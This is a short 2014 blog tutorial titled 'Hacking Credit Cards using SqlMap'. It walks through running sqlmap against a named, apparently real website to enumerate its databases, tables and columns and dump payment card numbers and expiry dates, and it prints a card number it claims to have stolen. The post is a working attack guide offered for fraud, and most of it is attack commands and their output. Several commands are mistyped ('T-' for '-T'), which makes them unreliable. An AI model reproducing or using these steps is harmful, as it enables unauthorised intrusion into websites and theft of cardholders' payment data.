Tuesday, July 15, 2014

Hacking Credit Cards using SqlMap

SQLMAP TUTORIAL FOR Credit cards 


Hello guyz Jorge Here ;)

Tools you will need 


click above to download,

First.. After you download and install python you must download Sqlmap for windows
After download it .. [Sqlmap Windows]

extract the file in Drive C

After that open your Command Promp (CMD)
Type   cd\
And then press ENTER
Type cd sqlmap\
And Enter

Copy your victim link
And type to cmd like this

sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs

Replace http://yoursite.com/index.php?id=123 to your link target
Enter!

-----------------------------------------------------------------------------------------------------------

The injected site will show the Database
My testing site http://ditto3d.com/gallery.php?id=7
Example Database Shown Is : ditto3d
                                              information_schema

If you want choose any database
you must do like shown above
sqlmap.py -u http://yoursite.com/index.php?id=123=7 -D databasename

-----------------------------------------------------------------------------------------------------------

-D (for Database)
databasename for example i put 'ditto3d' for get the table
So my site will like this

sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d --tables

For your site
--> sqlmap.py -u http://yoursite.com/index.php?id=123 -D your database --tables
Press Enter!

you will get a lot of tables
such as

[ users ]
[ category ]
[ links ]
[payments] 
[cart]

from the tables , choose one of your target to get Credit cards information

then your code in cmd will be like this

sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database -T your target tables

like i chose for payments
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T payments 

-----------------------------------------------------------------------------------------------------------

Alright , we go to the next
what you must do is to get column
just add --columns after your code
it will be show like this

sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database T- your target tables --columns

Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users --columns

-----------------------------------------------------------------------------------------------------------

The tables will show the columns
such as users contain :

[ cc]
[ exp]
[ name ]
[ address line 1]
[ address line 2] 
[zip]
[ state] 
[country] 
[phone]
[email]

what you must to do is
adding   -C cc --dump   behind

example :

sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T payments -C cc --dump

Yes you get it
cc is : 4744751222661499

then do the same thing , but this to get rest details
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users -C exp --dump

The exp is : 0818  >>> mean 08/2018

-----------------------------------------------------------------------------------------------------------
Warning! : If you get the database , tables and columns
''  --  '' this string must be a one
such as like this

from database
--> after injected
--> the database are showed

the word database and the double string ( -- )
will be change
it will be like -D
the word database will short and be D
the word D must be a big word

-T   /  -C

( --dump ) do not change this string

After the big word such as -D
You must give one space

--->   -D database

sql map is totally free programe, keep enjoy and say thanx to Jorge 

Say thnx to : jorge lanson

Contact       : westernexploit@yahoo.com

0 Comments:

Post a Comment